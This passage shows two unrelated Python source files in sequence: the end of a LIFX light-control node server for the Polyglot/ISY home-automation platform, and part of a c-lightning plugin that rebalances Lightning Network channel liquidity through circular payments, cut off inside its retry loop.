{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxcolor'
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual,
'RR': setManual, 'SET_HSBKD': setHSBKD,
'BRT': brighten, 'DIM': dim, 'FDUP': fade_up,
'FDDOWN': fade_down, 'FDSTOP': fade_stop,
'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness, 'WAVEFORM': set_wf
}
class MultiZone(Light):
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.num_zones = 0
self.current_zone = 0
self.new_color = None
self.pending = False
self.effect = 0
def update(self):
self.connected = 0
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if not self.pending:
try:
self.color = self.device.get_color_zones()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.num_zones = len(self.color)
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
try:
self.setDriver(driver, self.color[zone][ind])
except (TypeError) as e:
LOGGER.debug('setDriver for color caught an error. color was : {}'.format(self.color or None))
self.setDriver('GV4', self.current_zone)
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self._set_st()
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def _set_st(self):
if self.num_zones == 0: return
if self.power:
avg_brightness = 0
for z in self.color:
avg_brightness += z[2]
avg_brightness /= self.num_zones
self.setDriver('ST', self._bri_to_percent(avg_brightness))
else:
self.setDriver('ST', 0)
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except (TypeError, ValueError):
self.duration = 0
try:
self.current_zone = int(self.getDriver('GV4'))
except (TypeError, ValueError):
self.current_zone = 0
self.update()
self.long_update()
def setOn(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val) * 65535 / 255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.color[zone][2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, trans, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV3', new_color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
def dim(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
return
new_bri = self.color[zone][2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
new_color = list(self.color[zone])
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def brighten(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
return
new_bri = self.color[zone][2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
new_color[2] = new_bri
try:
if self.current_zone == 0:
self.device.set_color(new_color, BRTDIM_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self._set_st()
self.setDriver('GV3', new_color[2])
def fade_up(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self._set_st()
if self.color[zone][2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
new_color[2] = BR_MAX
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_down(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[zone][2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
new_color[2] = BR_MIN
try:
if self.current_zone == 0:
self.device.set_color(new_color, FADE_INTERVAL, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_stop(self, command):
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = self.device.get_color_zones()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} multizone color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[zone][ind])
if self.color[zone][2] == BR_MIN or self.color[zone][2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
if self.current_zone == 0:
self.device.set_color(self.color[zone], 0, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.color[zone], 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def apply(self, command):
try:
if self.new_color:
self.color = deepcopy(self.new_color)
self.new_color = None
self.device.set_zone_colors(self.color, self.duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
LOGGER.info('Received apply command for {}'.format(self.address))
self.pending = False
def setColor(self, command):
if self.connected:
try:
_color = int(command.get('value'))
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
if self.current_zone == 0:
self.device.set_color(COLORS[_color][1], self.duration, True)
else:
self.device.set_zone_color(zone, zone, COLORS[_color][1], self.duration, True)
LOGGER.info('Received SetColor command from ISY. Changing {} color to: {}'.format(self.address,
COLORS[_color][0]))
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('mz setcolor error {}'.format(str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
else:
LOGGER.info('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
try:
if _cmd == 'SETZ':
self.current_zone = int(_val)
if self.current_zone > self.num_zones: self.current_zone = 0
driver = ['GV4', self.current_zone]
zone = deepcopy(self.current_zone)
if self.current_zone != 0: zone -= 1
new_color = list(self.color[zone])
if _cmd == 'SETH':
new_color[0] = int(_val)
driver = ['GV1', new_color[0]]
elif _cmd == 'SETS':
new_color[1] = int(_val)
driver = ['GV2', new_color[1]]
elif _cmd == 'SETB':
new_color[2] = int(_val)
driver = ['GV3', new_color[2]]
elif _cmd == 'CLITEMP':
new_color[3] = int(_val)
driver = ['CLITEMP', new_color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
self.color[zone] = new_color
if self.current_zone == 0:
self.device.set_color(new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, new_color, self.duration, rapid=False)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('setmanual mz error {}'.format(ex))
LOGGER.info(
'Received manual change, updating the mz bulb zone {} to: {} duration: {}'.format(zone, new_color,
self.duration))
if driver:
self.setDriver(driver[0], driver[1])
else:
LOGGER.info('Received manual change, however the mz bulb is in a disconnected state... ignoring')
def setHSBKDZ(self, command):
query = command.get('query')
if not self.pending:
self.new_color = deepcopy(self.color)
self.pending = True
current_zone = int(query.get('Z.uom56'))
zone = deepcopy(current_zone)
if current_zone != 0: zone -= 1
self.new_color[zone] = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
try:
self.duration = int(query.get('D.uom42'))
except TypeError:
self.duration = 0
try:
if current_zone == 0:
self.device.set_color(self.new_color, self.duration, rapid=False)
else:
self.device.set_zone_color(zone, zone, self.new_color, self.duration, rapid=False, apply=0)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('set mz hsbkdz error %s', str(ex))
def set_effect(self, command):
query = command.get('query')
effect_type = int(query.get('EF.uom25'))
if effect_type < 0 or effect_type > 1:
LOGGER.error('Invalid effect type requested')
return
''' 0 - No effect, 1 - Move '''
effect_speed = int(query.get('ES.uom42'))
''' the device expects the effect duration in nanoseconds, so convert from milliseconds by multiplying by 10**6 '''
effect_duration = int(query.get('ED.uom42')) * 1000000
parameters = [0, int(query.get('ER.uom2'))]
try:
self.device.set_multizone_effect(effect_type=effect_type, speed=effect_speed, duration=effect_duration,
parameters=parameters)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('set_effect error {}'.format(ex))
commands = {
'DON': setOn, 'DOF': Light.setOff,
'APPLY': apply, 'QUERY': Light.query,
'SET_COLOR': setColor, 'SETH': setManual,
'SETS': setManual, 'SETB': setManual,
'CLITEMP': setManual, 'RR': setManual,
'SETZ': setManual, 'SET_HSBKDZ': setHSBKDZ,
'BRT': brighten, 'DIM': dim,
'FDUP': fade_up, 'FDDOWN': fade_down,
'FDSTOP': fade_stop, 'DFON': setOn,
'DFOF': Light.setOff, 'SETIR': Light.set_ir_brightness,
'WAVEFORM': Light.set_wf, 'EFFECT': set_effect
}
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV4', 'value': 0, 'uom': 56},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxmultizone'
class Tile(Light):
"""
LiFX Tile Node Class (inherits from Light)
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name, dev)
self.tile_count = 0
self.effect = 0
def start(self):
try:
self.tile_count = self.device.get_tile_count()
except Exception as ex:
LOGGER.error(f'Failed to get tile count for {self.name}: {ex}')
self.setDriver('GV8', self.tile_count)
super().start()
def update(self):
effect = None
try:
effect = self.device.get_tile_effect()
except Exception as ex:
LOGGER.error(f'Failed to get {self.name} effect {ex}')
if effect is not None:
if int(effect['type']) > 0:
self.effect = int(effect['type']) - 1
else:
self.effect = 0
self.setDriver('GV9', self.effect)
super().update()
def save_state(self, command):
mem_index = str(command.get('value'))
custom_data = deepcopy(self.controller.polyConfig['customData'])
try:
color_array = self.device.get_tilechain_colors()
except Exception as ex:
LOGGER.error(f'Failed to retrieve colors for {self.name}: {ex}')
return
''' Create structure for color storage'''
if 'saved_tile_colors' not in custom_data:
custom_data['saved_tile_colors'] = {}
if self.address not in custom_data['saved_tile_colors']:
custom_data['saved_tile_colors'][self.address] = {}
custom_data['saved_tile_colors'][self.address].update({mem_index: color_array})
self.controller.saveCustomData(custom_data)
def recall_state(self, command):
if self.effect > 0:
LOGGER.info(f'{self.name} is running effect, stopping effect before recall_state()')
try:
self.device.set_tile_effect(effect_type=0, speed=3000, duration=0, palette=[])
except Exception as ex:
LOGGER.error(f'Failed to stop {self.name} effect: {ex}')
self.effect = 0
self.setDriver('GV9', self.effect)
mem_index = str(command.get('value'))
try:
color_array = self.controller.polyConfig['customData']['saved_tile_colors'][self.address][mem_index]
except Exception as ex:
LOGGER.error(f'Failed to retrieve saved tile colors {mem_index} for {self.name}: {ex}')
return
try:
self.device.set_tilechain_colors(color_array, self.duration)
except Exception as ex:
LOGGER.error(f'Failed to set tile colors for {self.name}: {ex}')
def set_tile_effect(self, command):
query = command.get('query')
effect_type = int(query.get('EF.uom25'))
if effect_type < 0 or effect_type > 2:
LOGGER.error('Invalid effect type requested')
return
self.setDriver('GV9', effect_type)
''' 0 - No effect, 1 - Reserved, 2 - Morph, 3 - Flame '''
''' However we skip 1 in the NodeDef '''
if effect_type > 0:
effect_type += 1
if effect_type == 2:
brightness = int(query.get('B.uom56'))
palette = [(0, 65535, brightness, 3500), (7281, 65535, brightness, 3500), (10922, 65535, brightness, 3500),
(22209, 65535, brightness, 3500),
(43507, 65535, brightness, 3500), (49333, 65535, brightness, 3500),
(53520, 65535, brightness, 3500)]
else:
palette = []
effect_speed = int(query.get('ES.uom42'))
''' the Tile expects the effect duration in nanoseconds, so convert from milliseconds by multiplying by 10**6 '''
effect_duration = int(query.get('ED.uom42')) * 1000000
try:
self.device.set_tile_effect(effect_type=effect_type, speed=effect_speed, duration=effect_duration,
palette=palette)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('set_tile_effect error {}'.format(ex))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'GV8', 'value': 0, 'uom': 56},
{'driver': 'GV9', 'value': 0, 'uom': 25},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxtile'
commands = {
'DON': Light.setOn, 'DOF': Light.setOff, 'QUERY': Light.query,
'SET_COLOR': Light.setColor, 'SETH': Light.setManual,
'SETS': Light.setManual, 'SETB': Light.setManual,
'CLITEMP': Light.setManual,
'RR': Light.setManual, 'SET_HSBKD': Light.setHSBKD,
'BRT': Light.brighten, 'DIM': Light.dim, 'FDUP': Light.fade_up,
'FDDOWN': Light.fade_down, 'FDSTOP': Light.fade_stop,
'DFON': Light.setOn, 'DFOF': Light.setOff,
'SETIR': Light.set_ir_brightness, 'WAVEFORM': Light.set_wf,
'EFFECT': set_tile_effect, 'TILESV': save_state, 'TILERT': recall_state
}
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, label, grp=None):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
if grp:
self.lifxGroup = grp
else:
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
# self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command=None):
self.update()
self.reportDrivers()
def _power_on_change(self):
if not self.controller.change_pon:
return
try:
self.lifxGroup.set_power(True, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Error on setting {} power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label,
self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid=True)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
LOGGER.info(
'Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label,
self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info(
'Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(
self.name, COLORS[_color][0], self.numMembers))
self._power_on_change()
def setHue(self, command):
_hue = int(command.get('value'))
try:
self.lifxGroup.set_hue(_hue, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethue error caught %s', str(ex))
else:
LOGGER.info('Received SetHue command for group {} from ISY. Changing hue to: {} for all {} members.'.format(
self.name, _hue, self.numMembers))
self._power_on_change()
def setSat(self, command):
_sat = int(command.get('value'))
try:
self.lifxGroup.set_saturation(_sat, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setsaturation error caught %s', str(ex))
else:
LOGGER.info(
'Received SetSat command for group {} from ISY. Changing saturation to: {} for all {} members.'.format(
self.name, _sat, self.numMembers))
self._power_on_change()
def setBri(self, command):
_bri = int(command.get('value'))
try:
self.lifxGroup.set_brightness(_bri, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setbrightness error caught %s', str(ex))
else:
LOGGER.info(
'Received SetBri command for group {} from ISY. Changing brightness to: {} for all {} members.'.format(
self.name, _bri, self.numMembers))
self._power_on_change()
def setCTemp(self, command):
_ctemp = int(command.get('value'))
try:
self.lifxGroup.set_colortemp(_ctemp, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolortemp error caught %s', str(ex))
else:
LOGGER.info(
'Received SetCTemp command for group {} from ISY. Changing color temperature to: {} for all {} members.'.format(
self.name, _ctemp, self.numMembers))
self._power_on_change()
def set_ir_brightness(self, command):
_val = int(command.get('value'))
try:
self.lifxGroup.set_infrared(_val)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group set_infrared_brightness error caught %s', str(ex))
else:
LOGGER.info(
'Received SetIR command for group {} from ISY. Changing infrared brightness to: {} for all {} members.'.format(
self.name, _val, self.numMembers))
self._power_on_change()
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
except TypeError:
duration = 0
try:
self.lifxGroup.set_color(color, duration=duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
LOGGER.info(
'Received SetHSBKD command for group {} from ISY. Setting all members to Color {}, duration {}'.format(
self.label, color, duration))
self._power_on_change()
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD,
'SETH': setHue, 'SETS': setSat, 'SETB': setBri,
'CLITEMP': setCTemp, 'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('Lutron RadioRA2')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
rebalance.py
|
#!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
delay = plugin.cltv_final
for r in reversed(route):
r['msatoshi'] = msatoshi.millisatoshis
r['amount_msat'] = msatoshi
r['delay'] = delay
channels = plugin.rpc.listchannels(r['channel'])
ch = next(c for c in channels.get('channels') if c['destination'] == r['id'])
fee = Millisatoshi(ch['base_fee_millisatoshi'])
# BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
fee += (msatoshi * ch['fee_per_millionth'] + 10**6 - 1) // 10**6 # integer math trick to round up
msatoshi += fee
delay += ch['delay']
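# A quick worked example of the fee/round-up arithmetic above (hypothetical channel
# policy, not taken from a real network): with base_fee_millisatoshi=1000,
# fee_per_millionth=10 and an amount of 123456 msat, the proportional part is
# ceil(123456 * 10 / 10**6) = ceil(1.23456) = 2 msat, computed via
# (123456 * 10 + 10**6 - 1) // 10**6. The hop fee is therefore 1002 msat and the
# amount expected from the previous hop becomes 124458 msat.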
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
channel = next(c for c in peer['channels'] if c.get('short_channel_id') == scid)
if check_state:
if channel['state'] != "CHANNELD_NORMAL":
raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, channel['state'])})
if not peer['connected']:
raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
return channel
def amounts_from_scid(plugin, scid):
channels = plugin.rpc.listfunds().get('channels')
channel = next(c for c in channels if c.get('short_channel_id') == scid)
our_msat = Millisatoshi(channel['our_amount_msat'])
total_msat = Millisatoshi(channel['amount_msat'])
return our_msat, total_msat
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
channels = plugin.rpc.listchannels(short_channel_id).get('channels')
for ch in channels:
if ch['source'] == my_node_id:
return ch['destination']
raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
def find_worst_channel(route):
if len(route) < 4:
return None
start_id = 2
worst = route[start_id]['channel']
worst_val = route[start_id - 1]['msatoshi'] - route[start_id]['msatoshi']
for i in range(start_id + 1, len(route) - 1):
val = route[i - 1]['msatoshi'] - route[i]['msatoshi']
if val > worst_val:
worst = route[i]['channel']
worst_val = val
return worst
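# Example of find_worst_channel() with hypothetical per-hop amounts: for a route whose
# 'msatoshi' values are [1003000, 1002000, 1000500, 1000200, 1000000] over channels
# A..E, the candidates are the inner hops starting at index 2: channel C costs
# 1002000 - 1000500 = 1500 msat and channel D costs 1000500 - 1000200 = 300 msat,
# so C is returned as the most expensive (worst) channel to exclude next time.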
def cleanup(plugin, label, payload, success_msg, error=None):
try:
plugin.rpc.delinvoice(label, 'unpaid')
except RpcError as e:
# race condition: waitsendpay timed out, but the invoice got paid anyway
if 'status is paid' in e.error.get('message', ""):
return success_msg
if error is None:
error = RpcError("rebalance", payload, {'message': 'Rebalance failed'})
raise error
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error when this isn't possible.
#
# EXAMPLE
# |------------------- out_total -------------|
# OUT -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN +v <= |-- in_ours --||---------- in_theirs ---------| <= -v
# |--------- in_total --------------------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
# O* vo = out_ours - (out_total/2)
# I* vi = (in_total/2) - in_ours
# return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
out_ours, out_total = int(out_ours), int(out_total)
in_ours, in_total = int(in_ours), int(in_total)
in_theirs = in_total - in_ours
vo = int(out_ours - (out_total / 2))
vi = int((in_total / 2) - in_ours)
# cases where one option can be eliminated because it exceeds other capacity
if vo > in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi > out_ours and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# cases where one channel is still capable to bring other to balance
if vo < 0 and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi < 0 and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# when both options are possible take the one with least effort
if vo > 0 and vo < in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(min(vi, vo))
raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
maxfeepercent: float = 0.5, retry_for: int = 60, exemptfee: Millisatoshi = Millisatoshi(5000)):
"""Rebalancing channel liquidity with circular payments.
This tool helps to move some msatoshis between your channels.
"""
if msatoshi:
msatoshi = Millisatoshi(msatoshi)
maxfeepercent = float(maxfeepercent)
retry_for = int(retry_for)
exemptfee = Millisatoshi(exemptfee)
payload = {
"outgoing_scid": outgoing_scid,
"incoming_scid": incoming_scid,
"msatoshi": msatoshi,
"maxfeepercent": maxfeepercent,
"retry_for": retry_for,
"exemptfee": exemptfee
}
my_node_id = plugin.rpc.getinfo().get('id')
outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
in_ours, in_total = amounts_from_scid(plugin, incoming_scid)
plugin.log("Outgoing node: %s, channel: %s" % (outgoing_node_id, outgoing_scid), 'debug')
plugin.log("Incoming node: %s, channel: %s" % (incoming_node_id, incoming_scid), 'debug')
# If amount was not given, calculate a suitable 50/50 rebalance amount
if msatoshi is None:
msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
plugin.log("Estimating optimal amount %s" % msatoshi)
# Check that the requested amount fits within the selected channels' capacities
if msatoshi > out_ours or msatoshi > in_total - in_ours:
raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})
route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
start_ts = int(time.time())
label = "Rebalance-" + str(uuid.uuid4())
description = "%s to %s" % (outgoing_scid, incoming_scid)
invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
payment_hash = invoice['payment_hash']
success_msg = ""
try:
excludes = []
# exclude all own channels to prevent unwanted shortcuts [out,mid,in]
mychannels = plugin.rpc.listchannels(source=my_node_id)['channels']
for channel in mychannels:
excludes += [channel['short_channel_id'] + '/0', channel['short_channel_id'] + '/1']
while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
r = plugin.rpc.getroute(incoming_node_id, msatoshi, riskfactor=1, cltv=9, fromid=outgoing_node_id, exclude=excludes)
route_mid = r['route']
route = [route_out] + route_mid + [route_in]
setup_routing_fees(plugin, route, msatoshi)
fees = route[0]['amount_msat'] - msatoshi
# check fee and exclude worst channel the next time
# NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
worst_channel_id = find_worst_channel(route)
if worst_channel_id is None:
raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
excludes += [worst_channel_id + '/0', worst_channel_id + '/1']
continue
success_msg = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
"outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "settled",
"message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
for r in route:
plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')
try:
plugin.rpc.sendpay(route, payment_hash)
plugin.rpc.waitsendpay(payment_hash, retry_for + start_ts - int(time.time()))
return success_msg
except RpcError as e:
plugin.log("RpcError: " + str(e), 'debug')
